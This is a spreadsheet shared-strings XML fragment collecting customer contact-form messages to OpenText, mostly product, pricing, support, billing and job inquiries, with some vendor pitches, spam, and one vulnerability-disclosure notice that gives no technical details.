    <t>Hi my name is Shawn I work with Honeywell and we are updating our files for our library. We are trying to locate SKU’S/manufacturers parts number for your software that we may be missing in our files. I was wondering if possibly you could provide me with a list of SKU’S for your software products? I can also, if you need me to give you a list as well of what we are looking for, I just thought if we could get a list we could have on file here for us as well. Could you please provide the correct contact if you are unable to assist?_x000D_
_x000D_
Thank You, _x000D_
Shawn Temple</t>
  </si>
  <si>
    <t>Looking for an Archiving solution to archive records from Orace eBusiness Suite</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I'm Technical Leader within Orange Cyberdefense company, specialised in security and especially penetration testing._x000D_
I sent you an email the 13/08/2018 about a security vulnerability we found in one of your products: Infofusion Integration Center._x000D_
Unfortunately, we had no response. _x000D_
_x000D_
For the record, we would like to share with you the technical details in order you could provide a patch._x000D_
_x000D_
For your information, this vulnerability is referenced as CVE-2018-15589 by MITRE._x000D_
_x000D_
We are waiting for you to fix the vulnerability before we disclose the technical details._x000D_
Without any answer from your side we will publicly publish all technical details in accordance with our responsible disclosure policy._x000D_
_x000D_
Feel free to contact me (by mail preferably),_x000D_
_x000D_
Best Regards,_x000D_
Nicolas KERSCHENBAUM</t>
  </si>
  <si>
    <t>Re: Website Issues...?_x000D_
_x000D_
Hello_x000D_
_x000D_
_x000D_
My name is Addam Scott and I am a Digital Marketing Specialists for a Creative Agency._x000D_
_x000D_
I noticed a few technical errors which correspond to a drop in website traffic over the last 6-8 months which I thought I would bring to your attention._x000D_
_x000D_
After closer inspection, it appears your site is lacking in 4 key criteria._x000D_
_x000D_
1- Website Speed_x000D_
2- Link Diversity_x000D_
3- Domain Authority_x000D_
4- Competition Comparison_x000D_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Name, company’s website address (mandatory) and /or phone number._x000D_
_x000D_
Regards,_x000D_
Addam Scott_x000D_
addamscotts@gmail.com</t>
  </si>
  <si>
    <t>Need to create a ticket for the transmission error in Opentext Process 360 application</t>
  </si>
  <si>
    <t xml:space="preserve">We need to evaluate BIRT Enterprise edition and IHUB tool functionality and requesting for free demo trail , Can we please have a business Skype call next week for evaluation. _x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
Is OpenText Exceed™ 15.0.5 support to Windows server 2012 R2 OS?_x000D_
If no, then is there any other option from OpenText ?_x000D_
_x000D_
Thank you._x000D_
_x000D_
Regards,_x000D_
Manoj _x000D_
</t>
  </si>
  <si>
    <t>你好。 我想问一件事。 Hello。</t>
  </si>
  <si>
    <t>Have a nice day, Can you send me Encase download center link ?</t>
  </si>
  <si>
    <t>Just like that</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
 _x000D_
Greetings from Agilitics._x000D_
 _x000D_
We are Authorized Training Partners with Hortonworks, Google Cloud and Talend and provide training for all their courses._x000D_
 _x000D_
Please let us know if you wish to take up any of these training so we can take this forward._x000D_
 _x000D_
Hope to hear from you soon._x000D_
 _x000D_
Regards,_x000D_
Firdose Fathima_x000D_
Inside Sales Manger_x000D_
Agilitics Pte. Ltd_x000D_
</t>
  </si>
  <si>
    <t>Dear All,_x000D_
_x000D_
Here at Merck we are using eTMF Archive system  with Content server with 6.7_x000D_
 We are looking for an upgrade of eTMF system, Can you kindly schedule a call with us to explain the features and functionalities new version can offer._x000D_
_x000D_
Regards,_x000D_
Amar</t>
  </si>
  <si>
    <t xml:space="preserve">I keep receiving emails purporting to come from your company with subject lines such as "OpenText Invoice: 9000757973 (UK10) for Zaiwalla &amp; Co LLP ID: 0010422696" .  There is nothing in the body of the email to suggest that these are genuine and not fraudulent messages and for security reasons I will not open the attachments.  If there is some amount outstanding by our firm to your company, please send to us a complete statement of account and the name and contact number of an account representative we can speak with to confirm amounts owing and payment details.  Thank you. </t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/Madam_x000D_
_x000D_
We received an invoice from you and we noticed that the address was incorrect. Our customer number is 10454051 and our new postal address is:_x000D_
_x000D_
NIRA Dynamics AB_x000D_
Wallenbergs gata 4_x000D_
SE-58330 LINKOPING_x000D_
SWEDEN_x000D_
_x000D_
If you have the possiblity to send the invoices via email you can also them to finance@niradynamics.se. I hope you can forward this to the right person._x000D_
_x000D_
Kind regards,_x000D_
Tobias Carlstedt_x000D_
</t>
  </si>
  <si>
    <t>Need pricing model and other details on the OpenText Perceptiv and OpenText Axcelerate products</t>
  </si>
  <si>
    <t>Dear Valued Training Provider, _x000D_
Greetings from NIIT!_x000D_
My name is Srikanth and I represent the strategic sourcing team of NIIT. _x000D_
We are the managed services provider for Ericsson. This basically means that we will be administrating and procuring the external trainings that are requested by the Ericsson employees. All the external training requirements from Ericsson, whether direct or indirect, will be handled by NIIT._x000D_
We currently have an Ericsson request for enrollment of an employee for the course “Building an Investigation with Encase (DF210” provided by your organization. _x000D_
_x000D_
Please contact me on the email id provided in-order to discuss further in detail._x000D_
_x000D_
Thanks,_x000D_
Srikanth</t>
  </si>
  <si>
    <t>OpenText HostExplorer (ehem. Humingbird?), bitte um Rückruf, nach 10 Min. Warteschleife habe ich aufgegeben!</t>
  </si>
  <si>
    <t xml:space="preserve">It is about GuidanceSoftware tech support._x000D_
Are you still providing it or not, we are going into accademic year, Encase is part of curriculum. We have SMS till March 2019 plese let us know your postion. _x000D_
Also I've open a ticket OTCS Ticket 3951296 a month ago and have received no update or no access to your support pages. _x000D_
</t>
  </si>
  <si>
    <t>Register Actuate support account</t>
  </si>
  <si>
    <t xml:space="preserve">Good Morning, I am working with a number of clients that use your EDRMS software and was wondering would it be possible to move this to a Cloud based IaaS/PaaS solution? would this be a supportable configuration within the terms of your service agreement? Thanks, Iain </t>
  </si>
  <si>
    <t>cloud solution for rightfax</t>
  </si>
  <si>
    <t>Предлагаю Рассылку в Хрумере за 10 usd  круглосуточно на 7-30 млн свежих ресурсов. Обучаю желающих интернет рекламе. Лучшее. что узнал и применяю на практике. Опыт с 1993 года. Реклама частникам и Предприятим. Ответы в скайпе evg7773 Viber  +380976131437</t>
  </si>
  <si>
    <t>Since my email id is changed from "rrao@arisglobal.co.in" to "Rajaram.Rao@arisglobal.com", I am not able to login to portal as my old email id does not exist anymore for a password reset. Please add my new email id and send me the password word reset link.</t>
  </si>
  <si>
    <t>Hello, _x000D_
We want to order a license for Open Text Corporation Imagenation 8.30. _x000D_
Could you please advise how to proceed? _x000D_
Kind regards, _x000D_
Cristi</t>
  </si>
  <si>
    <t>Dear Team,_x000D_
We want to organize a training for 5 people in Delhi, India. Request you to please share the below information at the earliest possible._x000D_
1. Tentative Training calendars_x000D_
2.  Training cost including other expenses._x000D_
3. Trainer profiles/details._x000D_
_x000D_
Please feel free to reach out to me on my email for any further detail that you may need</t>
  </si>
  <si>
    <t>I need a job.       &amp;  make my career</t>
  </si>
  <si>
    <t xml:space="preserve">I am doing a comparison for a DMS for a client of mine. I am comparing a few DMS technologies and would like to ask a few questions for my compariison, _x000D_
_x000D_
Does Open Text have a BIM (Building Information Management) Viewer or Viewers_x000D_
Can it store engineering drawings and large files_x000D_
Can it allow for Multipe user interfaces_x000D_
Can it be deployed on Premise if cloud a problem for the client_x000D_
What security prototocals do you have i.e) ISO_x000D_
Does the sytem have a construction field capability - Photos form site through a workflow to contractor etc_x000D_
Can you tell me which Engineering company you have deployed to , Power Utilities, Mining, EPC (Engineering, Procurement and Construction) _x000D_
Please feel free to email me or we can skype etc,_x000D_
_x000D_
Kevin_x000D_
</t>
  </si>
  <si>
    <t>Is it necessary have Adobe Pro installed on your PC in order to fully use Redact-It?</t>
  </si>
  <si>
    <t>I WANT TO QUOTE</t>
  </si>
  <si>
    <t>I signed up for support but never received confirmation email.</t>
  </si>
  <si>
    <t xml:space="preserve">Good Afternoon! _x000D_
_x000D_
RGO Products is holding an event with Keynote speaker, Gale Moutrey – VP of Brand Experience + Workplace Innovation at Steelcase. We sent out ‘Save the Date’ emails, but we had Leslie's old email from when she was with agrium – is it possible to get her email in order to send this invitation? _x000D_
_x000D_
Thank you!_x000D_
</t>
  </si>
  <si>
    <t>Good day._x000D_
_x000D_
We are a systems consulting company._x000D_
We want to participate in your business partner program._x000D_
How can I get a demo of its different products and solutions?_x000D_
Thank you for your kind response, I look forward to your comments._x000D_
_x000D_
Regards!</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, my name is Andrea Hernandez. I am a part of the ViperBots Robotics Organization at Vandegrift High School (Austin, Texas) and am on FTC Robotics Team 4545. We are reaching out to local businesses in order to learn more about career opportunities in STEM so we can provide younger boys and girls with more knowledge on STEM fields. We were wondering if we would be able to tour your company or speak with some of the employees to gain a better understanding of how STEM is applied in the workplace. It would be great if you could set something up for us. Thank you for your support and we hope to hear back from you soon!! </t>
  </si>
  <si>
    <t xml:space="preserve">I have some questions regarding the file transfer use case and whether HIPAA or other data would be successfully protected utilizing your Hightail product. </t>
  </si>
  <si>
    <t>I am not able to access my support account.  I have confirmed my email and I tried changing my password as well.</t>
  </si>
  <si>
    <t>researching open text solution for isu solution</t>
  </si>
  <si>
    <t xml:space="preserve">1.Password reset failed, cannot access portal._x000D_
2. I originally sent this request to Lani Jacobs (ljacobs@opentext.com), but it was returned as undeliverable.  I am reaching out to you regarding our interest to schedule a product demonstration.  _x000D_
_x000D_
Our Firm has, for many years, used OpenText document management software.  We, as a group, are not well versed in what your product may fully do for us, if properly configured.  _x000D_
_x000D_
In the past year or so, we have had substantial changes in our work environment.  We have challenges related to document management/profiling, document flow and document access/security.   _x000D_
_x000D_
I understand that we are licensed to move to a newer version of your product than what we are currently using and we plan to move from DOCs10 to DOCs16 shortly.  However, this will not happen before we become better acquainted with any new bells and whistles in the newer version and can determine whether we previously failed to implement product features/options that would facilitate our workflow .  _x000D_
_x000D_
We are interested to make improvements that make sense for us.  To learn more about your product  and to discuss our document-related issues with your representative(s) will be a beneficial and timely activity for our project team._x000D_
_x000D_
Please advise &amp; thanks,  If you are not the individual who can assist me with scheduling the product demo, please forward my request to the representative who has this responsibility._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for a quote for Documentum. </t>
  </si>
  <si>
    <t>We have an Adobe form saved to DM that has been used frequently.  It is no longer releasing in DM after editing.  If we choose to release, it loses the edits that were just made in the form.  After printing to pdf and recreating as a fillable form it works fine.  Is there something that would cause the form to do that?</t>
  </si>
  <si>
    <t>Questions about my EnCE invoice.</t>
  </si>
  <si>
    <t>We have a customer wishing to start using EDI communications (856 notification of shipped railcar; 944 notification of received railcar; 945 notification of cargo loaded to vessel).  The expected annual volume of messages is 856-3,500; 944-3,500; 945-50 records with about 5 details per record. We do not have EDI within our cargo system.  Do you have a service offering that would assist us.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I would like to speak with someone regarding a demo of OpenText EnCase eDiscovery._x000D_
_x000D_
Thanks,_x000D_
Candice</t>
  </si>
  <si>
    <t>Hello, _x000D_
_x000D_
I was trying to download the Gartner MQ 2017 from your web site. However, I always got a mistake as the company selection field does not work properly. _x000D_
_x000D_
Can you assist with this, please, and send me the report? _x000D_
_x000D_
Thank you!_x000D_
Tanja Breitling-Zboril</t>
  </si>
  <si>
    <t xml:space="preserve">Hi _x000D_
_x000D_
Allow me to introduce myself, Liz I’m with Yuk Yuk’s comedy head office. I was wondering whom would I speak to about our corporate entertainment services. _x000D_
_x000D_
Looking forward to hearing back from someone._x000D_
Liz </t>
  </si>
  <si>
    <t>We have had a contract for Teleform for 10+ years. I have recently joined Magellan and the team, and I am re-evaluating our tools and processes to determine whether it meets our needs for the future. Our current rep - James (I think) was not responsive to my request for a meeting. Please reach out to me as soon as possible._x000D_
_x000D_
Thank you!</t>
  </si>
  <si>
    <t>Need technical information on Brava for SharePoint, specifically support for SharePoint on-prem vs. SharePoint Online/O365 and the ability to markup/annotate PDFs</t>
  </si>
  <si>
    <t xml:space="preserve">I am making an inquiry on my Easylink account. I want to see what are my options when it comes to service and rates </t>
  </si>
  <si>
    <t>I wish to enroll for OpenText VIM certification. I would like to know the detailed procedure for the same.</t>
  </si>
  <si>
    <t>I have an account with Guidance before you completely merged with OpenText but can't log in or reset my password as it states my email is not registered yet I've taken multiple virtual courses and have a passport associated with the account.</t>
  </si>
  <si>
    <t>good morning can you help me with the QSP tool ??? It is urgent</t>
  </si>
  <si>
    <t xml:space="preserve">Good morning,_x000D_
_x000D_
I learned about your annual engagements and hoped to be a resource to you moving forward. My agency (UTA) represents a broad range of clients from across industries – Anderson Cooper, Michael Lewis, Daniel Kahneman, Jake Tapper, Beth Comstock, Preet Bharara, Guy Raz and more – and I would like very much to offer some suggested keynote speakers to you to follow Malcolm Gladwell and James Comey whom I understand you had appear this year._x000D_
_x000D_
Would it be possible to schedule a call to discuss your plans for your future events?_x000D_
_x000D_
I look forward to hearing back._x000D_
_x000D_
Best regards,_x000D_
_x000D_
Charlotte Perman_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We have been RightFax users for approx. 20 years.  We have an OpenText Fax Gateway with a PRI + RightFax v.9 installed on a VM.   We are looking to move to a cloud version of  OpenText / RightFax but we need to retain our fax DID's that terminate on the PRI via AT&amp;T.  We need to understand how we would make the transition to cloud while retaining the DID's.  Please contact via email at mikemurphy@mbk.com. We do not do significant outbound faxing, but we need to receive inbound faxes via a HIPAA compliant solution (we understand that our current RF solution is not HIPAA compliant).   Thank you,_x000D_
</t>
  </si>
  <si>
    <t>I am looking to locate a territory account manager in Ohio who can help me sell this solution since CDW is a partner.</t>
  </si>
  <si>
    <t>Fazemos utilização dos serviços oferecidos pela OpenText, mas a ultima nota fiscal que recebemos para pagarmos foi do mês de Junho._x000D_
Poderiam verificar se à pendências para ser pagas e o motivo pelo qual não estamos recebendo?</t>
  </si>
  <si>
    <t>Hi, I would like to talk with someone in your sales department about licensing cost for Certified Records Manager Plus.  I am currently designing a system for 25,000 plus users and would like to know what kind of licensing and cost is available for such a deployment.</t>
  </si>
  <si>
    <t>I replaced a laptop for a user who had been using the Fax2Mail toolbar in Outlook.  The documentation says the toolbar is only compatible with Windows 7, and up to Office 2013.  The user now has Windows 10 with Office 2016.  Are there any compatible options available for her?</t>
  </si>
  <si>
    <t>We are currently being billed on a monthly basis from Open Text.  The charges first appeared on our September 2018 American Express invoice, and are being charged monthly.  If someone could provide the details regarding these charges, it would be appreciated.  Thank you.</t>
  </si>
  <si>
    <t>How do I register the two XT1 imagers my agency purchased?  I cannot find a link or any other way to register the devices on your website.</t>
  </si>
  <si>
    <t>Bonjour je 'arrive pas a vous contacter par téléphone en m excusant de vous déranger J aimerais dans la mesure du possible pouvoir obtenir un entretien car je suis actuellement en formation opérateur logistique et je dois effectuer une immersion sur Mulhouse dans ce domaine je suis intéressé par votre être prise pourriez vous me recontacter merci d avance crdt</t>
  </si>
  <si>
    <t>Einer unserer Kunden möchte eine Lizenz für Hummingbird V15 erwerben. Er kann aber nicht online kaufen, daher ging die Anfrage an uns. Können wir das für den Kunden abwickeln?</t>
  </si>
  <si>
    <t>Unable to access Knowledge center despite signing in.....keeps asking for confirmation email. This has happened at least 5 times in the past . please help</t>
  </si>
  <si>
    <t>Nadeem Motors_x000D_
 importers of all kind of new &amp; used cars &amp; machinery_x000D_
Our certifications/registrations_x000D_
Executive member of FAISALABAD CHAMBER OF COMMERCE &amp; INDUSTRY PAKISTAN_x000D_
Securities and Exchange Commission of Pakistan (ID#0089708)_x000D_
Federal Board of Revenue Govt of Pakistan (NTN#0946711-4)_x000D_
And many other awards/certificates we won during our professional career since 1993 to till now….._x000D_
Dear Sir/madam,_x000D_
Hope you are enjoying good business aspects. At the moment we are importing different mescal. Items from Hong Kong, Japan, U.K. Malaysia, Germany and Italy._x000D_
We are interested to import stock lots, 2nd hand used machinery, electronics from your esteemed company.   ._x000D_
If you have any stock items mentioned like below, please let us know and send us packing list and details to proceed further.  Please also mention payment terms like L/C on sight or other options as u deemed better._x000D_
Waiting your prompt reply and action._x000D_
We intr Nadeem Motors_x000D_
 importers of all kind of new &amp; used cars &amp; machinery_x000D_
Our certifications/registrations_x000D_
Executive member of FAISALABAD CHAMBER OF COMMERCE &amp; INDUSTRY PAKISTAN_x000D_
Securities and Exchange Commission of Pakistan (ID#0089708)_x000D_
Federal Board of Revenue Govt of Pakistan (NTN#0946711-4)_x000D_
And many other awards/certificates we won during our professional career since 1993 to till now….._x000D_
Dear Sir/madam,_x000D_
Hope you are enjoying good business aspects. At the moment we are importing different mescal. Items from Hong Kong, Japan, U.K. Malaysia, Germany and Italy._x000D_
We are interested to import stock lots, 2nd hand used machinery, electronics from your esteemed company.   ._x000D_
If you have any stock items mentioned like below, please let us know and send us packing list and details to proceed further.  Please also mention payment terms like L/C on sight or other options as u deemed better._x000D_
Waiting your prompt reply and action._x000D_
We introduce ourselves as leading importer 0f Pakistan. _x000D_
Nadeem Motors is a Pakistan’s well renowned group, operating</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren_x000D_
_x000D_
Ich würde gerne die Funktion Content Analyse (insbesondere Sentiment Analyse) ausprobieren. In welchem Produkt ist diese Funktion zu finden? Kann man es testen?_x000D_
_x000D_
Freundliche Grüsse_x000D_
Josip Jurisic</t>
  </si>
  <si>
    <t>SVP votre offre pour: open text file system archiving</t>
  </si>
  <si>
    <t>Hi! I'm a senior student of BS Information Systems at DLSU and I'm looking into OpenText for internship. Where can I send in my resume? Thank you!</t>
  </si>
  <si>
    <t>We are very interested in finding out more about your OCR capabilities, ease of integration into existing technologies and project approach/timeframes.</t>
  </si>
  <si>
    <t xml:space="preserve">I am surveying a product to integrate OCR technology and SAP ERP.  My requirement is that the OCR product should support hand-writing Chinese characters.  Moreover the characters should be saved into a customized SAP ERP program.  Please let me know if you have any office or partner in Taiwan. </t>
  </si>
  <si>
    <t>Need to know about document sharing product named Documentum</t>
  </si>
  <si>
    <t>Please provide us with a direct contact for the OpenText Infofusion search solution.</t>
  </si>
  <si>
    <t>Cost for Teamsite Tool Admin</t>
  </si>
  <si>
    <t>If I purchase this will I be able to install the DWG viewer on my desktop ?</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sirs _x000D_
_x000D_
We are looking to glean information regarding market-leading e-disclosure platforms for law firms. OpenText is one such platform that we would be interested, having sought quotes from other companies such as Relativity and Cyfor. As such we grateful if could provide me with information regarding your what e-disclosure services for litigation purposes your company offers. In respect of each of the options available (if more than one), please can you provide us with quote for the following services:_x000D_
_x000D_
- hosting fees (cost per GB per month plus the cost of any access fee);_x000D_
- hourly rates for processing; and_x000D_
- project management fees._x000D_
_x000D_
Yours faithfully_x000D_
Mathilda Traill on behalf of Ashfords LLP_x000D_
 </t>
  </si>
  <si>
    <t>I´m the project manger for a Project that is implementing an e-archive at Länsförsäkringar AB. We want to get in Contact with you in order to invite you to come and demostrate/present your product so we can make a first evaluation before potenitally inviting you to participate in our request for proposal.</t>
  </si>
  <si>
    <t>Application Governance &amp; Archiving for Microsoft SharePoint_x000D_
_x000D_
Sehr geehrte Damen und Herren,_x000D_
_x000D_
ich habe sie am 25.09 Kontaktiert, mit der bitte genaue Informationen zum Thema Opentext  und SharePoint mir zuzusenden. Leider habe ich von ihnen noch nichts gehört, sodass ich die Vermutung habe das es untergegangen ist. Können sie mir bitte schnellstmöglich Informationen zukommen lassen. _x000D_
_x000D_
_x000D_
Mit freundlichen grüßen_x000D_
_x000D_
Christian Mielke</t>
  </si>
  <si>
    <t>The private sector is always at the leading edge of technology adoption. We are now talking about AT,IOT, Blockchain technologies. Governmnet is still at the otpimisation or Digitization stage. How does OPenText plan to utilize its partners, such as Datacentrix to fast-track Public Sector Digitalization, especially in South Africa?</t>
  </si>
  <si>
    <t>Need to reach my gole</t>
  </si>
  <si>
    <t>Please provide pricing for both RightFax and Fax2Mail.</t>
  </si>
  <si>
    <t>Change of Role</t>
  </si>
  <si>
    <t>Looking for Corporate training for 10 Participants.</t>
  </si>
  <si>
    <t>Need Quotation for  RigthFAX , 5 Users which cab integrate with office 365</t>
  </si>
  <si>
    <t>Hi_x000D_
Request a quote for_x000D_
AMC for Open Text NFS Solo with Reactvation Charges_x000D_
Customer- 3DPLM Software Solutions Ltd</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Are you interested to AS400 Users?_x000D_
_x000D_
We have 1830 Ready-to- buy leads of AS400 Customers Records from Australia._x000D_
_x000D_
Test File will be given to review and check the quality without any obligations. _x000D_
Would you like me to send you a Test data and additional information?_x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t>need to access Knowledge Center to review Service pakcs and upgrades to be implemented IBM clients</t>
  </si>
  <si>
    <t>I would like to request for quotation/pricing on RightFax. Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">CANNOT GET FAXES SET TO NEW FAX NUMBER THAT WAS PORTED IN_x000D_
510-352-2064_x000D_
</t>
  </si>
  <si>
    <t>I have First Class server version 7.0 running on an Old Macintosh running Mac OS 9.1_x000D_
_x000D_
My serial number for my Firstclass server is: 1501479_x000D_
I have 40 REGULAR USERS allowed, (22 used 18 available_x000D_
Unlimited Remote users_x000D_
2 remote sessions_x000D_
_x000D_
I would like to upgrade_x000D_
_x000D_
Please be kind to advise a path to upgrade, and obtain a new server_x000D_
_x000D_
I only need the email part and maybe the webmail part, but just that, no phone or other services._x000D_
_x000D_
Thankyou a lot for your prompt contact</t>
  </si>
  <si>
    <t xml:space="preserve">right fax for healthcare_x000D_
</t>
  </si>
  <si>
    <t>I am inquiring as to whether OpenText offers trial licenses or low cost access for university students--I will have a group of approximately 30 students in the Spring studying NLP/NLU in the Dept. of Modern Languages, working in Arabic, Chinese, Korean, French, German, Russian, and Spanish.  Thanks!  Pete</t>
  </si>
  <si>
    <t xml:space="preserve">Again some how you all have locked me out of the account.  I've tried several times to log in and nothing. So i request password reset and you all state i'm not registered. This is really a pain when i need to look something up that was supposed to have been sent to us and i don't have any records showing it was pushed to us.  Can someone please help me reset my password.  _x000D_
Thank you.  Acct# </t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
I am Binish Hassan from Mactrans Logistics. I wanted to share some details about my company. _x000D_
_x000D_
We are a Third-Party Logistics provider that specializes in North American LTL and Truckload Transportation Management. We have offices in Toronto and Montreal._x000D_
We provide Canadian Domestic, US Domestic &amp; Can-US-Mexican Cross Border intermodal, road and expedited services._x000D_
_x000D_
Your freight is in good hands with Mactrans. Our carriers are inspected and Mactrans is named as a certificate holder on all their insurance policies.  For extra protection we carry additional Cargo, E&amp;O and Legal Liability insurance. Mactrans is bonded, licensed and one of fifty Canadian 3PL’s that is a member of the Transportation Intermediaries Association (TIA)._x000D_
In 2016 &amp; 2017 Mactrans was named one of Canada’s fastest growing companies by Canadian Business Magazine._x000D_
_x000D_
Look forward to hearing from you. Have a great day!_x000D_
_x000D_
Best Regards_x000D_
 Binish Hassan_x000D_
Logistics Account Manager _x000D_
_x000D_
Mactrans Logistics Inc._x000D_
81 Zenway Blvd Unit 16, Vaughan, ON L4H 0S5_x000D_
T 905.856.6800 ext 254_x000D_
TF 877.856.6805	 	F 905.856.6820_x000D_
C 416.705.1499_x000D_
   _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I need to get lifecycle information on Exeed on Demand 8</t>
  </si>
  <si>
    <t>We are evaluating possible DAM tools. We would like to know whether OpenText Media Management is able to handle Personally Identifying Information (customer faces) in a secure manner. We would also like to know if this could be utilized for within business streaming of videos.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi - I am trying to find the right contact.  Stanford University I believe is an existing OpenText customer in the process of migrating data from Nolij to OpenText product.  I am a Project Manager at Stanford's School of Engineering and would like to find more out about 1) what OpenText product(s) Stanford is already using 2) receive demo of OpenText 3) discuss upcoming digitization use case we have at the School of Engineering to see how best to partner with OpenText.  Thanks! </t>
  </si>
  <si>
    <t>We have a client looking for the VPAT for Xtender.  We understand this Product is under OpenText now. Thank you, Annette</t>
  </si>
  <si>
    <t>Looking for help in trying to access our GXS Production Catalog</t>
  </si>
  <si>
    <t>Getting job</t>
  </si>
  <si>
    <t>I am a sourcing specialist for Kroger who is launching an RFP next week for a DAM system. We would like to include you in the process. Please have the appropriate person contact me for further instructions. Thanks!</t>
  </si>
  <si>
    <t>Hey! I had a quick question about the DF120 - Foundations in Digital Forensics with EnCase OnDemand course._x000D_
_x000D_
First, is there a time limit from when we register that we must complete the course within?_x000D_
_x000D_
Second, the duration lists "32 hours" for the course. Is that accurate? Is that the amount of time I should assume it will take to fully complete this course?_x000D_
_x000D_
Thank you,_x000D_
_x000D_
Stephen Mercier</t>
  </si>
  <si>
    <t xml:space="preserve">Please set up access for support to mirror user Robert Moss from Prudential Financial. We will be supporting the Open Text/Documentum migration for Prudential Individual Life. </t>
  </si>
  <si>
    <t>Information about a product</t>
  </si>
  <si>
    <t xml:space="preserve">I have a charge on my credit card for $19.88 each month and I have no idea what it's for.  I attempted calling 4 times earlier but got hung up on every time.  I want a call back today with an explanation. </t>
  </si>
  <si>
    <t xml:space="preserve">Hi, I would like to speak to a representative in the Mexico City office._x000D_
_x000D_
Regards, </t>
  </si>
  <si>
    <t>To take job</t>
  </si>
  <si>
    <t xml:space="preserve">we are attempting to download Release 16 but a message come back saying No Access.  I've verified email followed the steps but still get the No Access message. </t>
  </si>
  <si>
    <t>We need to verify if this fax # is available, 866-741-0563, and if it can be assigned to Jeffrey.Baun@hcahealthcare.com</t>
  </si>
  <si>
    <t xml:space="preserve">Our Company is looking into turning two fax lines into eFax. </t>
  </si>
  <si>
    <t>I would like a presentation about Content Server in French, if possible. I can provide more information once we have established contact.</t>
  </si>
  <si>
    <t xml:space="preserve">We just received a bill for the Annual Maintenance P20 Software 12 MO, from 11/01/18 – 10/31/18.  The total comes out to $8,454.60 without tax, and it’s the same price as last year.  Since we have a little time can you please look into this to see if this is the most cost effective route.  I need an answer on this and i need information on our Account Manager.  The email address on your invoice comes back no longer in service (gxs-ar_team@opentext.com).  I contacted Aaron Banastas since he dealt with us last but he said he is not our Account Manager.  I feel I'm getting passed along with no answers, and unfortunately without answers i can not get approval to have this invoice paid._x000D_
_x000D_
Customer ID #: 10047016_x000D_
Billing Doc #: 9000711361_x000D_
Renewal #: 0040121873_x000D_
Total Amount: $9,183.81_x000D_
</t>
  </si>
  <si>
    <t>Interesse an der Nutzung Ihrer Textgenerierung_x000D_
_x000D_
Guten Tag,_x000D_
_x000D_
ich arbeite bei First Living, einem Online-Portal für Premium-Immobilien. Von unseren Kunden (Maklern und Einrichtungsexperten) erhalten wir Texte, die wir auf unserer Website bei den jeweiligen Profilen der Kunden einbauen. Da wir durch die stetig steigende Anzahl von Kunden mittlerweile nicht mehr genug Kapazitäten haben, diese Texte selbst anzufassen, zu optimieren und in unique Content umzuwandeln, sind wir aktuell auf der Suche nach einer Software, die uns diese Arbeit abnehmen kann. _x000D_
_x000D_
Aus diesem Grund bin ich bei der Recherche auf Ihre Textgenerierung aufmerksam geworden und würde mithilfe eines ersten Gesprächs sehr gerne herausfinden, ob Ihre Software uns bei diesem Projekt helfen könnte._x000D_
_x000D_
Hätten Sie kommende Woche Zeit dafür?_x000D_
_x000D_
Vielen Dank für eine Rückmeldung, gerne per Mail, da ich ab nächster Woche aus dem Home Office arbeite. _x000D_
_x000D_
Mit freundlichen Grüßen,_x000D_
Alina Boie</t>
  </si>
  <si>
    <t xml:space="preserve">I am an academic staff of the Faculty of Law, Niger Delta University, Nigeria. My faculty is about to commence a postgraduate program in Cybercrime Law &amp; Digital Forensics on or about October 2018. I am the coordinator of the program - i intend to include your product for the purposes of teaching the students(educational purpose only) - subsequently interested students would be obliged to get the products - invariably, making me your sales representative. In what way can you be of assistance to my institution to successfully drive the process? </t>
  </si>
  <si>
    <t>We are looking to implement a DAM solution within our brand product creation teams.  I'd like to setup a call to discuss our initiative and arrange a demo of your solutions.</t>
  </si>
  <si>
    <t xml:space="preserve">Can you please provide us with the details of your partners in Middle east and gulf area </t>
  </si>
  <si>
    <t>Looking for a job (Documentum Consultant)</t>
  </si>
  <si>
    <t>Need to know invoice scanning solution of Opentext. Do opentext have any product which has OCR capabilities to read vendor invoices coming from email/fax/scanner/paper etc.</t>
  </si>
  <si>
    <t>Please I need the full list of authorized partners for Rightfax product support in Argentina._x000D_
Thanks</t>
  </si>
  <si>
    <t>Do you'll have training programs on AI/IoT for trainers of Call centres (which would benefit to design a training module to carry out training online for out station locations)</t>
  </si>
  <si>
    <t>Hi._x000D_
In Nykredit Bank Denmark we have an increasing need for reliable document classification and text extraction (OCR). Do you have any danish partners who can give us an introduction to OpenText Capture Document Reader and maybe a demo of the tool? We have a concrete pilot project where this software might be the right tool to go for. You are more that welcome to contact me either by phone or email._x000D_
_x000D_
Kind regards,_x000D_
Mikkel Thordal Andersen</t>
  </si>
  <si>
    <t>We recently upgraded our company accounting software and it has EDI capabilities built into it.   So we will need to cancel our EDI service with you all.  Please advise on the steps to get this done.  Thanks.  Bob</t>
  </si>
  <si>
    <t>Dear Opentext,_x000D_
_x000D_
the Powersport and Marine divisions of BRP are entering in a major project to implement SAP S/4 HANA in the upcoming years. The current SAP ECC is sharing the DMS with the SAP instance at Rotax (currently in the process to be upgraded) and same OpenText Imagin tools for invoice scanning &amp; processing._x000D_
_x000D_
We are looking for a Canadian contact to have initial discussion about our S/4 implementation and understand the requirement from OpenText perspective. Key question we have now is that do we have to upgrade OpenText, what will be the requirement in the S/4 system._x000D_
_x000D_
You will be very kind to send us the name of your contact in NA._x000D_
_x000D_
Best regards_x000D_
Martin</t>
  </si>
  <si>
    <t xml:space="preserve">We introduce ourselves as ARIMA Insurance Software WLL, a mature software house based in the Middle-East, providing software solutions for the insurance / reinsurance industry.  Our clients are based in Africa, Middle-East and South-East Asia._x000D_
Today we are looking for ECM/BPM Solution to be inetagrted with our core insurance/reinsurance systems._x000D_
_x000D_
